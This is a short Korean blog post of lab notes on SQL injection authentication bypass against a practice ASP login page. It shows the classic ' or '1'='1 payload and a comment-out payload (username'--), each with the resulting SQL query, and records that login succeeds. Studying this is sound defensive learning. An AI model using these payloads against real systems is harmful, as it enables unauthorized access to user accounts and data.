yuil :: SecOps

[WebSec] SQL Injection 실습 - 인증우회 본문

실습/Web Security 실습

[WebSec] SQL Injection 실습 - 인증우회

yuil.lee 2025. 10. 21. 11:05
SQL Injection을 이용한 인증우회
xp

member_login.check.asp 열기
복사

-- id :	nuno
-- pw:	laksjdfl

select	user_id, user_pw, name, email, homepage 
from	member 
where	user_id='nuno' 
and	user_pw='laksjdfl'

-- id :	nuno
-- pw:	dlaudtn

select	user_id, user_pw, name, email, homepage 
from	member 
where	user_id='nuno' 
and	user_pw='dlaudtn'

select * from member where 1=1
select * from member where 1=0

-- id :	' or '1'='1
-- pw:	' or '1'='1

select	user_id, user_pw, name, email, homepage 
from	member 
where	user_id='' or '1'='1' 
and	user_pw='' or '1'='1'

조건문 전체가 '참'이 되어 사용자 정보가 전부 조회되는 모습

' or '1'='1

로그인이 된다.

-- id :	ckh1234'--
-- pw:	anything

select	user_id, user_pw, name, email, homepage 
from	member
where	user_id='ckh1234'--and	user_pw='anything'

비밀번호 주석처리

 



반응형